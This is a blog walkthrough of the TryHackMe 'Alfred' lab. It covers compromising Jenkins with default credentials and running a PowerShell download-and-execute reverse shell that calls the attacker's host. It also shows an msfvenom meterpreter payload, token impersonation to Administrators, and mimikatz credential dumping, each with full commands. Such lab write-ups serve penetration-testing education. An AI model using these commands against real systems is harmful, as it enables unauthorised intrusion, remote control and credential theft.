Tryhackme Alfred Walkthrough

Posted on

Exploited Jenkins gained an initial shell, then escalated privileges by exploiting Windows authentication tokens. Deployment of meterpreter with web_delivery.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.

Recon

Target: 10.10.230.14

Nmap scan:

1
nmap -sV -sC -oA nmap/alfred 10.10.230.14 -Pn

Nmap all ports:

1
nmap -p- nmap/alfred_allports 10.10.230.14 -Pn

Open Port Review:

Port 80 - Microsft IIS httpd 7.5 - webserver

image bruce.jpg and email exposed [email protected].

Port 3389 - Remote RDP

Port 8080 - Jetty 9.4.z-SNAPSHOT - webserver

login attempt with admin:admin enable access to backend.

version number exposed as Jenkins ver. 2.190.1

Jenkins searchsploit:

accessing console

discovered console:

1
http://10.10.230.14:8080/job/project/1/console

Under “Build” section of the /job/project/configure the “whoami” offers an ability execute commands on the target system.

Reverse Shell

using nishang PowerShellTcp.ps1 to create a reverse shell:

Github Link: https://github.com/samratashok/nishang.git

creating webserver on local machine via python3

1
python3 -m http.server

adding powershell command to console “Build” section:

1
powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.20.45:8000/PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.20.45 -Port 9000

Listener setup: rlwrap allows for (up, down, left, right keyboard commands)

1
rlwrap nc -lvnp 9000

Connection received:

Systeminfo

User.txt located: C:\Users\bruce\desktop\user.txt

Upgrading shell to meterpreter shell

create payload with msfvenom

1
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai EXITFUNC=thread LHOST=10.8.20.45 LPORT=9001 -f exe -o revshell9001exit.exe

Setup multi/handler

Download revshell to target

1
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.8.20.45:8000/revshell9001.exe','revshell9001.exe')"

Start process with:

1
Start-Process "revshell9001.exe"

(in my case meterpreter would hang and never fully connect to handler. Moved to creating meterpreter session with web_delivery)

Creating Meterpreter shell via web_delivery

took the generated code and executed on target:

Migrate to higher process

1
2
ps
migrate

elevated:

Windows User Impersonation

investigate privleages of bruce:

1
whoami /priv

from this we are able exploit as they are enabled:

1
2
SeDebugPrivilege
SeImpersonatePrivilege

Load Incognito + List tokens within meterpreter

1
2
load incognito
list_tokens -g

Impersonate token

1
impersonate_token "BUILTIN\Administrators"

root.txt

located at C:\Windows\System32\config

Post Exploitation

mimikatz extract

1
2
load kiwi
get_creds